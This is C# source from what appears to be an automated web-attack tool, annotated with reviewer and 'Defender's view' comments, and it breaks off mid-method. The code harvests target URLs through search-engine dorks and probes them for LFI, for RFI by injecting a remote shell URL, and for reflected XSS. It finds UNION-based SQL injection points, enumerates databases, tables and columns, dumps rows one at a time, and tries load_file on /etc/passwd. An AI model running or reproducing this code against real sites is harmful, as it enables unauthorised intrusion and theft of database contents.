// ? ===> %3F  (the query text is URL-encoded before it is placed in the request)
// Sends each search query in DorkArray to Yandex, one result page at a time, and hands
// every returned page to Extracteur.Yandex.
//   DorkArray: search queries; each is passed through HttpUtility.UrlEncode.
//   maxpage:   page limit as text. "maxpage + 0" is string concatenation, so "5" is parsed
//              as 50; Convert.ToInt16 throws on non-numeric text or values above 32767.
// The search home page is fetched once before the loops start. When a response contains
// "search requests sent from your IP" (presumably the engine's automated-traffic notice),
// paging for the current query stops and the next query begins.
public void Yandex(string[] DorkArray, string maxpage)
{
    int dorkCount = DorkArray.Length;
    int pageLimit = Convert.ToInt16(maxpage + 0);
    HttpRequete client = new HttpRequete();
    Extracteur extractor = new Extracteur();

    client.get("https://www.yandex.com/yandsearch");

    for (int dorkIndex = 0; dorkIndex < dorkCount; dorkIndex++)
    {
        int pageIndex = 0;
        while (pageIndex < pageLimit)
        {
            string requestUrl = "http://www.yandex.com/yandsearch?text=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&p=" + pageIndex;
            string body = client.get(requestUrl);

            // Block notice: abandon the remaining pages of this query without a UI refresh.
            if (body.Contains("search requests sent from your IP"))
            {
                break;
            }

            extractor.Yandex(body);
            form.UpInfos();
            pageIndex++;
        }
    }
}
// Checks whether a file-system error is echoed back when a parameter value is replaced
// by "../".
// link is split on delimeteur; for each segment the text before the first '=' is kept,
// "=../" is appended, and the resulting string is fetched as-is.
// Returns true when the response to the LAST segment contains "No such file or directory":
// the flag is overwritten on every iteration, so earlier hits are not remembered.
// Any exception while splitting or fetching yields false.
// Defender's view: the only signal is a verbose error message in the response body;
// with error output suppressed this check has nothing to match.
public bool Lfi(string link)
{
    HttpRequete client = new HttpRequete();
    bool lastHit = false;
    try
    {
        foreach (string segment in link.Split(delimeteur))
        {
            string probe = segment.Trim().Split('=')[0] + "=../";

            // Always true given the suffix appended above; kept to mirror the original guard.
            if (!probe.Contains("="))
            {
                continue;
            }

            lastHit = client.get(probe).Contains("No such file or directory");
        }
        return lastHit;
    }
    catch (Exception)
    {
        return false;
    }
}
// Requests the database user, version and current database name through the stored
// injection point (_url_point) and shows them in the main form.
// The var_n placeholder in _url_point is replaced by a concat() expression that wraps the
// three values in separateur markers and splits them with s_separateur.
// Returns false when the response does not contain separateur; otherwise stores the
// database name via setBD, fills the user/version/server-IP text boxes on the UI thread
// and returns true. The server IP is resolved by Outils.avoirip from the host part of
// _url_point (the third '/'-separated element).
public bool setInfos()
{
    HttpRequete client = new HttpRequete();
    Outils tools = new Outils();

    string expression = "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")";
    string body = client.get(_url_point.Replace(var_n, expression));

    if (!body.Contains(separateur))
    {
        return false;
    }

    string[] fields = ch.extSubResult(s_separateur, ch.extResult(separateur, body));
    string serverIp = tools.avoirip(_url_point.Split('/')[2]);
    setBD(fields[2]);

    // Controls are updated through Invoke; presumably this method runs off the UI thread.
    form_principale.groupBox4.Invoke((MethodInvoker)(() =>
    {
        form_principale.txt_user.Text = fields[0];
        form_principale.txt_version.Text = fields[1];
        form_principale.txt_ipserveur.Text = serverIp;
    }));
    return true;
}
// Sends each search query in DorkArray to Google in steps of 10 results and hands the
// returned pages to Extracteur.Google.
//   DorkArray: search queries; each is passed through HttpUtility.UrlEncode.
//   maxpage:   limit as text. "maxpage + 0" is string concatenation, so "5" is parsed as 50
//              and compared against the "start" offset.
// A page is skipped only when it contains BOTH "CAPTCHA" and the value of form.monip;
// a page containing just one of the two is still passed to the extractor. Paging continues
// after a skipped page.
public void Google(string[] DorkArray, string maxpage)
{
    int dorkCount = DorkArray.Length;
    int offsetLimit = Convert.ToInt16(maxpage + 0);
    HttpRequete client = new HttpRequete();
    Extracteur extractor = new Extracteur();

    for (int dorkIndex = 0; dorkIndex < dorkCount; dorkIndex++)
    {
        int offset = 0;
        while (offset < offsetLimit)
        {
            string requestUrl = "https://www.google.com/search?q=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&start=" + offset;
            string body = client.get(requestUrl);

            // Same truth table as (!CAPTCHA) || (!monip), including the short-circuit.
            bool blocked = body.Contains("CAPTCHA") && body.Contains(form.monip);
            if (!blocked)
            {
                extractor.Google(body);
            }

            form.UpInfos();
            offset += 10;
        }
    }
}
// Checks whether a parameter value pointing at SHELL_URL gets included by the target.
// link is split on delimeteur; for each segment the text before the first '=' is kept and
// "=" + SHELL_URL + "?" is appended, and the resulting string is fetched as-is.
// A response counts as a hit when it contains "RFI_SUCCESSFUL", does not contain
// "$invulnerable", and is longer than 20 characters.
// Returns the result for the LAST segment only (the flag is overwritten each iteration);
// any exception yields false.
// Defender's view: the request carries a full URL as a parameter value, which is visible
// in access logs and is blocked when remote includes are disabled on the server.
private bool Rfi(string link, string SHELL_URL)
{
    HttpRequete client = new HttpRequete();
    try
    {
        bool lastHit = false;
        foreach (string segment in link.Split(delimeteur))
        {
            string probe = segment.Trim().Split('=')[0] + ("=" + (SHELL_URL + "?"));

            // Always true given the "=" appended above; kept to mirror the original guard.
            if (!probe.Contains("="))
            {
                continue;
            }

            string body = client.get(probe);
            lastHit = body.Contains("RFI_SUCCESSFUL")
                && !body.Contains("$invulnerable")
                && body.Length > 20;
        }
        return lastHit;
    }
    catch (Exception)
    {
        return false;
    }
}
// Returns the number of schemas other than information_schema, as reported by the target.
// A count(0) sub-select on information_schema.schemata replaces the var_n placeholder in
// _url_point; the number is read back from between two separateur markers in the response
// (ch.extResult). Convert.ToInt32 throws when the extracted text is not a number.
// Defender's view: the request URL contains a sub-select against information_schema,
// which is a strong indicator in web-server or WAF logs.
private int getNombreDB()
{
    HttpRequete client = new HttpRequete();

    string countQuery = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")";
    string body = client.get(_url_point.Replace(var_n, countQuery));

    string countText = ch.extResult(separateur, body);
    return Convert.ToInt32(countText);
}
// Returns the row count of db_name.tb_name as reported by the target.
// db_name and tb_name are concatenated into the query text unchanged (not hex-encoded).
// The count(0) sub-select replaces the var_n placeholder in _url_point and the number is
// read back from between two separateur markers (ch.extResult). Convert.ToInt32 throws
// when the extracted text is not a number.
private int getNombreDonne(string db_name, string tb_name)
{
    HttpRequete client = new HttpRequete();

    string countQuery = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from " + db_name + "." + tb_name + ")";
    string body = client.get(_url_point.Replace(var_n, countQuery));

    string countText = ch.extResult(separateur, body);
    return Convert.ToInt32(countText);
}
// Returns a count read from the target through the stored injection point.
// NOTE(review): despite the name, db_name and tb_name are not used; the query counts rows
// of information_schema.sChEmAtA excluding information_schema, i.e. schemas rather than
// columns. The mixed-case identifiers are part of the runtime string and are kept as-is.
// The number is read back from between two separateur markers (ch.extResult);
// Convert.ToInt32 throws when the extracted text is not a number.
private int getNombreColonne(string db_name, string tb_name)
{
    HttpRequete client = new HttpRequete();

    string countQuery = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from information_schema.sChEmAtA where not sChEmA_NaMe=" + ch.getHex("information_schema") + ")";
    string body = client.get(_url_point.Replace(var_n, countQuery));

    string countText = ch.extResult(separateur, body);
    return Convert.ToInt32(countText);
}
/*
 * EXCEPTION case noted by the author: a review-page URL whose id parameter is 999999.9
 * followed by a "union all select [t],null,..." suffix padded with nulls.
 */
// Analyses url for a usable UNION-based injection point and reports progress in the form.
// Steps visible in the code:
//   1. Writes "Analyse: <url>" to the status box (through Invoke).
//   2. Runs both the fast and the advanced checks of sqli_check; both always execute.
//   3. If either succeeds, walks the _union templates: counts columns (sqli_colonne.Compter),
//      then for each parameter locates a reflected column and sends a probe asking for
//      user(), version() and database() wrapped in separateur / s_separateur markers.
//   4. On the first response containing either marker, calls setResult and stops.
//   5. If neither check succeeded, writes a failure message to the status box.
// Side effects: assigns _url_originale, _url_base, _param, _nbr_colonne and _colonne_point.
// The whole body runs in a checked context, so integer overflow throws.
// Defender's view: one call produces many requests to the same path that differ only in a
// growing UNION SELECT suffix; the sequence is easy to spot in access logs.
public void Analyse(string url)
{
    form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
    {
        form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
    }));
    checked
    {
        HttpRequete hr = new HttpRequete();
        sqli_check vrf = new sqli_check();
        sqli_colonne colonne = new sqli_colonne();
        string url_inj_point = string.Empty;
        string inj_point_curr = string.Empty;
        bool point_trv = false;
        _url_originale = url;
        // Everything before the first '?' is treated as the base URL.
        _url_base = url.Split('?')[0];
        _param = ch.analyseParam(url);
        bool[] ok = new bool[2];
        ok[0] = vrf.demmareAnalyseFast(url);
        ok[1] = vrf.demmareAnalyseAvanced(url);
        if (ok[0] || ok[1])
        {
            int u = 0;
            // Union style 1
            while (!point_trv && u < _union.Count)
            {
                _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
                onFait((u + 1).ToString());
                for (int p = 0; p < _param.Count; p++)
                {
                    // The argument is built with the PREVIOUS value of _colonne_point,
                    // which is then overwritten by the result.
                    _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);
                    // Same URL shape, rebuilt with the updated _colonne_point.
                    url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);
                    // Replace any remaining "[t]" token with the encoded probe expression.
                    inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));
                    string page = hr.get(inj_point_curr);
                    // Either marker in the response is taken as proof that the probe was reflected.
                    if (page.Contains(separateur) || page.Contains(s_separateur))
                    {
                        setResult(page, url_inj_point);
                        point_trv = true;
                        break;
                    }
                }
                u++;
            }
        }
        else
        {
            form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
            {
                form.txt_statut_analyse.Text = "Injection char echouer :( ";
            }));
        }
    }
}
// Lists the tables of each selected database and adds them under the matching tree node.
//   chemin_node: tree paths separated by '\'; the first element is the database name.
// For every path: clears the children of the database node, asks the target for the
// comma-joined table names of that schema (group_concat on information_schema.tables,
// wrapped in separateur markers), and adds one child node per name.
// Errors are swallowed in three places (node lookup, table count, node insertion), so a
// failure leaves the tree unchanged without any message.
// Defender's view: the request contains group_concat(table_name) against
// information_schema.tables, a pattern that is distinctive in request logs.
internal void setTable(string[] chemin_node)
{
    foreach (string item in chemin_node)
    {
        string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
        int indexDB = -1;
        form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
        {
            try
            {
                // FirstOrDefault returns null when no node matches; the resulting
                // exception is swallowed below and indexDB stays -1.
                indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index;
                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Clear();
            }
            catch (Exception)
            {
            }
        }));
        // nbr is assigned here but not read again in this method.
        int nbr = 0;
        try
        {
            nbr = getNombreTable(mrc[0]);
        }
        catch
        {
        }
        HttpRequete hr = new HttpRequete();
        // Method 1 (disabled by the author): group_concat(table_name) used directly.
        // Method 2 (active): group_concat(table_name) wrapped in unhex(Hex(cast(... as char))).
        string inj = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(table_name) as char)))," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(mrc[0]) + ")";
        string url_f = _url_point.Replace(var_n, (inj));
        string page = hr.get(url_f);
        string tablebrut = ch.extResult(separateur, page);
        string[] tables = tablebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
        foreach (string table in tables)
        {
            if (!string.IsNullOrEmpty(table))
            {
                // Response text is passed through ch.regexHtmlScape before it is shown.
                string table_name = ch.regexHtmlScape(table);
                try
                {
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        form_principale.tree_schema_dmp.BeginUpdate();
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Add(table_name);
                        form_principale.tree_schema_dmp.Nodes[indexDB].Expand();
                        form_principale.tree_schema_dmp.EndUpdate();
                    }));
                }
                catch
                {
                }
            }
        }
    }
}
// Requests the database user, version and current database name through url_point.
// The var_n placeholder in url_point is replaced by a concat() expression that wraps the
// three values in separateur markers and splits them with s_separateur.
// Returns the values split out by ch.extSubResult when the response contains separateur;
// otherwise returns four empty strings.
internal string[] getInfos(string url_point)
{
    HttpRequete client = new HttpRequete();

    string expression = "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")";
    string body = client.get(url_point.Replace(var_n, expression));

    if (!body.Contains(separateur))
    {
        return new string[] { "", "", "", "" };
    }

    return ch.extSubResult(s_separateur, ch.extResult(separateur, body));
}
// Lists the columns of each selected table and adds them under the matching tree node.
//   chemin_node: tree paths separated by '\'; element 0 is the database, element 1 the table.
//                Paths with fewer than two elements are ignored.
// For every path: clears the children of the table node, asks the target for the
// comma-joined column names (group_concat on information_schema.columns, wrapped in
// separateur markers), and adds one child node per name.
// NOTE(review): the node lookups use FirstOrDefault(...).Index without a null check and
// without a try/catch, so a path that does not match the tree throws inside Invoke.
// Defender's view: the request contains group_concat(column_name) against
// information_schema.columns, a pattern that is distinctive in request logs.
internal void setColonne(String[] chemin_node)
{
    foreach (string item in chemin_node)
    {
        string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
        if (mrc.Length > 1)
        {
            int indexDB = -1;
            int indexTable = -1;
            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
            {
                indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index;
                indexTable = form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[1])).Index;
                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Clear();
            }));
            // nbr is assigned here but not read again in this method.
            int nbr = 0;
            try
            {
                nbr = getNombreColonne(mrc[0], mrc[1]);
            }
            catch
            {
            }
            HttpRequete hr = new HttpRequete();
            // Method 0 (disabled by the author): group_concat(column_name) used directly.
            // Method 1 (active): group_concat(column_name) wrapped in unhex(Hex(cast(... as char))).
            string inj = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(column_name) as char)))," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(mrc[0]) + " and table_name=" + ch.getHex(mrc[1]) + ")";
            string url_f = _url_point.Replace(var_n, ch.Encode(inj));
            string page = hr.get(url_f);
            string colonnebrut = ch.extResult(separateur, page);
            string[] colonnes = colonnebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
            foreach (string colonne in colonnes)
            {
                if (!string.IsNullOrEmpty(colonne))
                {
                    // Response text is passed through ch.regexHtmlScape before it is shown.
                    string colonne_name = ch.regexHtmlScape(colonne);
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Add(colonne_name);
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Expand();
                    }));
                }
            }
        }
    }
}
// Sends each search query in DorkArray to Bing in steps of 15 results and hands every
// returned page to Extracteur.Bing.
//   DorkArray: search queries; each is passed through HttpUtility.UrlEncode.
//   maxpage:   limit as text. "maxpage + 0" is string concatenation, so "5" is parsed as 50
//              and compared against the "first" offset.
// No block or CAPTCHA check is made on the response before extraction.
public void Bing(string[] DorkArray, string maxpage)
{
    int dorkCount = DorkArray.Length;
    int offsetLimit = Convert.ToInt16(maxpage + 0);
    HttpRequete client = new HttpRequete();
    Extracteur extractor = new Extracteur();

    // One pass per query.
    for (int dorkIndex = 0; dorkIndex < dorkCount; dorkIndex++)
    {
        // One request per result offset.
        int offset = 0;
        while (offset < offsetLimit)
        {
            string requestUrl = "http://bing.com/search?q=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&first=" + offset;
            extractor.Bing(client.get(requestUrl));
            form.UpInfos();
            offset += 15;
        }
    }
}
// Sends each search query in DorkArray to Yahoo search and hands every returned page to
// Extracteur.Yahoo.
//   DorkArray: search queries; each is passed through HttpUtility.UrlEncode.
//   maxpage:   limit as text. "maxpage + 0" is string concatenation, so "5" is parsed as 50
//              and compared against the "b" offset.
// The offset starts at 1 and advances by 10 while the request asks for n=100 results.
// No block or CAPTCHA check is made on the response before extraction.
public void Yahoo(string[] DorkArray, string maxpage)
{
    int dorkCount = DorkArray.Length;
    int offsetLimit = Convert.ToInt16(maxpage + 0);
    HttpRequete client = new HttpRequete();
    Extracteur extractor = new Extracteur();

    // One pass per query.
    for (int dorkIndex = 0; dorkIndex < dorkCount; dorkIndex++)
    {
        // One request per result offset.
        int offset = 1;
        while (offset < offsetLimit)
        {
            string requestUrl = "http://search.yahoo.com/search?n=100&p=" + HttpUtility.UrlEncode(DorkArray[dorkIndex]) + "&pstart=1&b=" + offset;
            extractor.Yahoo(client.get(requestUrl));
            form.UpInfos();
            offset += 10;
        }
    }
}
// Lists the schemas visible through the stored injection point and adds them to the tree.
// The schema count is fetched first (errors swallowed, leaving 0). The names are then
// requested as one comma-joined string (group_concat on information_schema.schemata,
// excluding information_schema, wrapped in separateur markers).
// When the count is greater than 1 the string is split on ',' and each name becomes a
// root node; otherwise the whole extracted string is added as a single node.
// Defender's view: the request contains group_concat(schema_name) against
// information_schema.schemata, a pattern that is distinctive in request logs.
internal void setAllBD()
{
    HttpRequete hr = new HttpRequete();
    int nbr = 0;
    try
    {
        nbr = getNombreDB();
    }
    catch
    {
    }
    // The author's note here showed the same query in mixed-case form with a literal
    // hex separator.
    string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(schema_name)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")";
    string url_f = _url_point.Replace(var_n, ch.Encode(inj));
    string page = hr.get(url_f);
    string dbbrut = ch.extResult(separateur, page);
    if (dbbrut != string.Empty)
    {
        if (nbr > 1)
        {
            string[] basededonnes = dbbrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
            foreach (string bd in basededonnes)
            {
                if (!string.IsNullOrEmpty(bd))
                {
                    // Response text is passed through ch.regexHtmlScape before it is shown.
                    string bd_name = ch.regexHtmlScape(bd);
                    TreeNode treeBD = new TreeNode(bd_name);
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        form_principale.tree_schema_dmp.BeginUpdate();
                        form_principale.tree_schema_dmp.Nodes.Add(treeBD);
                        form_principale.tree_schema_dmp.EndUpdate();
                    }));
                }
            }
        }
        else
        {
            // Single-schema path: the raw extracted text is used without regexHtmlScape.
            TreeNode treeBD = new TreeNode(dbbrut);
            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
            {
                form_principale.tree_schema_dmp.Nodes.Add(treeBD);
            }));
        }
    }
}
// Fast check: appends the sqli test string after each parameter of url in turn and reports
// whether any response is accepted by verifPage.
// Side effect: _param is replaced by the parameters parsed from url.
// Returns true on the first accepted response, false when every parameter was tried
// without one. The body runs in a checked context, so integer overflow throws.
// Defender's view: verifPage presumably looks for database error text in the response;
// returning generic error pages removes what this check relies on.
public bool demmareAnalyseFast(string url)
{
    checked
    {
        string basePart = url.Split('?')[0];
        HttpRequete client = new HttpRequete();
        chaine ch = new chaine();
        _param = ch.analyseParam(url);

        int index = 0;
        while (index < _param.Count)
        {
            // Parameters up to and including the current one, the test string, then the rest.
            string head = ch.genParamParIndex(_param, 0, index + 1);
            string tail = ch.genParamParIndex(_param, index + 1, _param.Count);
            string body = client.get(basePart + head + sqli + tail);

            if (verifPage(body))
            {
                return true;
            }
            index++;
        }
        return false;
    }
}
// Checks whether a script marker placed in a parameter value is echoed back unescaped.
// url is split on delimeteur; for segment i the element at index i of its '='-split is
// taken, the marker is appended after '=' and a double quote, and the result is fetched.
// A response counts as a hit when it contains the marker verbatim and does not contain
// "You have an error in your SQL syntax".
// Returns the result for the LAST segment only (the flag is overwritten each iteration).
// NOTE(review): the inner Split('=')[i] uses the loop index, so it can throw
// IndexOutOfRangeException for i >= 1; nothing in this method catches it.
// Defender's view: the marker only matches when the response reflects the input without
// HTML-encoding it; output encoding at the reflection point defeats the check.
public bool Xss(string url)
{
    HttpRequete client = new HttpRequete();
    bool lastHit = false;

    string[] segments = url.Split(delimeteur);
    for (int index = 0; index < segments.Length; index++)
    {
        string prefix = segments[index].Trim().Split('=')[index];
        string body = client.get(prefix + ('=' + ('"' + "><script>alert(\'XSS_SUCCESSFUL\')</script>")));

        bool reflected = body.Contains("<script>alert(\'XSS_SUCCESSFUL\')</script>");
        lastHit = reflected && !body.Contains("You have an error in your SQL syntax");
    }

    return lastHit;
}
// Sends each search query in DorkArray to AOL search, one page at a time, and hands every
// returned page to Extracteur.Aol.
//   DorkArray: search queries; concatenated into the URL without URL-encoding.
//   maxpage:   page limit as text. "maxpage + 0" is string concatenation, so "5" is parsed
//              as 50.
// The search home page is fetched once before the loops start. No block or CAPTCHA check
// is made on the response before extraction.
internal void Aol(string[] DorkArray, string maxpage)
{
    int dorkCount = DorkArray.Length;
    int pageLimit = Convert.ToInt16(maxpage + 0);
    HttpRequete client = new HttpRequete();
    Extracteur extractor = new Extracteur();

    client.get("http://search.aol.com/aol/webhome");

    // One pass per query.
    for (int dorkIndex = 0; dorkIndex < dorkCount; dorkIndex++)
    {
        // One request per result page.
        int pageIndex = 0;
        while (pageIndex < pageLimit)
        {
            string requestUrl = "http://search.aol.com/aol/search?q=" + DorkArray[dorkIndex] + "&page=" + pageIndex;
            extractor.Aol(client.get(requestUrl));
            form.UpInfos();
            pageIndex++;
        }
    }
}
// Reports whether the database account behind url_point can read a server-side file.
//   url_point: injection URL containing the var_n placeholder.
//   fichier:   file path to request; defaults to "/etc/passwd".
// The placeholder is replaced by an expression that hex-encodes load_file(<fichier>) and
// wraps it in separateur markers. Returns true only when the response contains separateur
// and the text extracted between the markers is not empty.
// Defender's view: a non-empty result means the database user holds the FILE privilege and
// the path is readable by the database process; revoking FILE from application accounts
// (and restricting secure_file_priv on MySQL) makes this check return false.
internal bool checkLoadFile(string url_point, string fichier = "/etc/passwd")
{
    HttpRequete client = new HttpRequete();
    Outils tools = new Outils();

    string expression = "cOnVeRt(/**/cOnCaT(" + ch.getHex(separateur) + "/**/hEx(/**/lOaD_FiLe(" + ch.getHex(fichier) + "))," + ch.getHex(separateur) + ") using utf8)";
    string body = client.get(url_point.Replace(var_n, expression));

    if (!body.Contains(separateur))
    {
        return false;
    }

    return ch.extResult(separateur, body) != "";
}
// Reads the rows of each selected table and shows them in the data grid.
//   chemin_node: tree paths separated by '\'; element 0 is the database, element 1 the
//                table, element 2 the selected columns joined by "[-COL]".
//                Paths with fewer than three elements are ignored.
// For every path: fetches the row count, adds one grid column per selected column name,
// then issues ONE request per row using "limit <d>,1" and adds the split result as a row.
// Database and table names are concatenated into the query text unchanged.
// getNombreDonne is called without a try/catch, so a failed count aborts the method.
// Defender's view: the row loop yields a run of near-identical requests whose only
// difference is an incrementing "limit N,1", which stands out in access logs and is a
// natural target for rate limiting.
internal void setDonne(String[] chemin_node)
{
    foreach (string item in chemin_node)
    {
        string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
        if (mrc.Length > 2)
        {
            int nbr_row = 0;
            nbr_row = getNombreDonne(mrc[0], mrc[1]);
            HttpRequete hr = new HttpRequete();
            string[] colonne = mrc[2].Split(new string[] { "[-COL]" }, StringSplitOptions.RemoveEmptyEntries);
            form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() =>
            {
                foreach (string element in colonne)
                {
                    if (element != string.Empty)
                    {
                        // Column name is used as both the grid column key and its header.
                        form_principale.dataGridView_dumper.Columns.Add(element, element);
                    }
                }
            }));
            for (int d = 0; d < nbr_row; d++)
            {
                string inj = "(select concat(" + BuildQuery(s_separateur, colonne) + ") from " + mrc[0] + "." + mrc[1] + " limit " + d + ",1)";
                string url_f = _url_point.Replace(var_n, inj);
                string page = hr.get(url_f);
                string donnebrut = ch.extResult(separateur, page);
                // Empty fields are kept (StringSplitOptions.None) so values stay aligned with columns.
                string[] resultLignes = donnebrut.Split(new string[] { s_separateur }, StringSplitOptions.None);
                // NOTE(review): the row is added when checkAllEmpty returns true; the helper
                // is not visible here, so confirm which case true stands for.
                if (checkAllEmpty(resultLignes))
                {
                    form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() =>
                    {
                        form_principale.dataGridView_dumper.Rows.Add(resultLignes);
                    }));
                }
            }
        }
    }
}
// Advanced check: for each parameter of url, replaces its value with an encoded test
// expression and reports whether any response is accepted by verifPageAdvenced.
// The expression is built from the baseI and baseF templates, with var_n replaced by the
// hex forms of separateur, testSTR and separateur joined by commas.
// Side effect: _param is replaced by the parameters parsed from url.
// Returns true on the first accepted response, false otherwise. The body runs in a
// checked context, so integer overflow throws.
public bool demmareAnalyseAvanced(string url)
{
    checked
    {
        string basePart = url.Split('?')[0];
        HttpRequete client = new HttpRequete();
        chaine ch = new chaine();
        _param = ch.analyseParam(url);

        string marker = ch.getHex(separateur) + "," + ch.getHex(testSTR) + "," + ch.getHex(separateur);
        string probe = baseI.Replace(var_n, baseF.Replace(var_n, marker));

        int index = 0;
        while (index < _param.Count)
        {
            // Current parameter with its value emptied, the encoded probe, then the rest.
            string head = ch.ViderDernierParam(ch.genParamParIndex(_param, 0, index + 1));
            string middle = ch.Encode(probe);
            string tail = ch.genParamParIndex(_param, index + 1, _param.Count);
            string body = client.get(basePart + head + middle + tail);

            if (verifPageAdvenced(body))
            {
                return true;
            }
            index++;
        }
        return false;
    }
}
// Finds which column number in url is reflected in the response.
//   url:        URL whose query string contains candidate column numbers.
//   maxColonne: highest column number to try; the loop runs from 1 to maxColonne + 1.
// For each candidate number, the first occurrence of that number's digits in the query
// string is replaced by an encoded concat() of a fixed marker string between 0x217e21
// separators, and the URL is fetched. Returns the first number whose response contains
// the marker, or -1 when none does.
// url.Split('?')[1] throws IndexOutOfRangeException when url has no '?'.
// NOTE(review): the regex matches digits anywhere in the query string, so a parameter
// value that happens to contain the number can be replaced instead of the column slot.
public int FindColonneVise(string url, int maxColonne)
{
    HttpRequete client = new HttpRequete();
    const string okstr = "QUADCOREENGINE666";
    string template = "concat(0x217e21," + var_n + ",0x217e21)";
    string basePart = url.Split('?')[0];
    string queryPart = "?" + url.Split('?')[1];

    int candidate = 1;
    while (candidate <= maxColonne + 1)
    {
        string encodedMarker = ch.Encode(template.Replace(var_n, ch.getHex(okstr)));
        Regex firstOccurrence = new Regex(Regex.Escape(candidate.ToString()));
        string probeUrl = basePart + firstOccurrence.Replace(queryPart, encodedMarker, 1);

        if (client.get(probeUrl).Contains(okstr))
        {
            return candidate;
        }
        candidate++;
    }

    return -1;
}
// Determines the column count of the query behind url_base by trial.
//   param:    parsed URL parameters.
//   url_base: URL without its query string.
//   union:    template containing the var_n placeholder.
// For each parameter and each width from 0 to 60, var_n in the template is replaced by
// GenSynHex(width), the result is encoded and substituted for the parameter's value, and
// the URL is fetched. Returns the first width whose response contains syntax_count, or 0
// when none matches. The body runs in a checked context.
// Defender's view: up to 61 requests per parameter, each with one more column than the
// last, form an unmistakable sequence in access logs.
public int Compter(List <string> param, string url_base, string union)
{
    checked
    {
        HttpRequete client = new HttpRequete();

        for (int paramIndex = 0; paramIndex < param.Count; paramIndex++)
        {
            int width = 0;
            while (width <= 60)
            {
                string head = ch.ViderDernierParam(ch.genParamParIndex(param, 0, (paramIndex + 1)));
                string middle = ch.Encode(union.Replace(var_n, GenSynHex(width)));
                string tail = ch.genParamParIndex(param, paramIndex + 1, param.Count);
                string body = client.get(url_base + head + middle + tail);

                if (body.Contains(syntax_count))
                {
                    return width;
                }
                width++;
            }
        }

        return 0;
    }
}
// Reports whether http://<url>/webdav/ serves a page containing "WebDAV testpage".
//   url: host (and optional path) without scheme; "http://" is always prepended.
// Returns false on any exception raised while fetching.
// Defender's view: the matched text is presumably a default test page shipped with a
// bundled server install; removing the default /webdav/ content or disabling WebDAV
// makes this check return false.
public bool WebDav_Scanner(string url)
{
    HttpRequete client = new HttpRequete();
    try
    {
        string target = ("http://" + (url + "/webdav/"));
        string body = client.get(target);
        return body.Contains("WebDAV testpage");
    }
    catch (Exception)
    {
        return false;
    }
}
// Searches url for a usable UNION-based injection point and returns it.
// Walks the _unionStyle templates: counts columns (sqli_colonne.Compter), then for each
// parameter locates a reflected column and sends a probe asking for user(), version() and
// database() wrapped in separateur / s_separateur markers.
// Returns the URL template (still containing the "[t]" token, if any) of the first probe
// whose response contains either marker, or the literal string "False" when none does.
// Side effects: assigns _url_originale, _url_base, _param, _nbr_colonne and _colonne_point.
// The body runs in a checked context, so integer overflow throws.
// NOTE(review): vrf is created but no preliminary check is run in this method.
public string Analyse(string url)
{
    checked
    {
        HttpRequete hr = new HttpRequete();
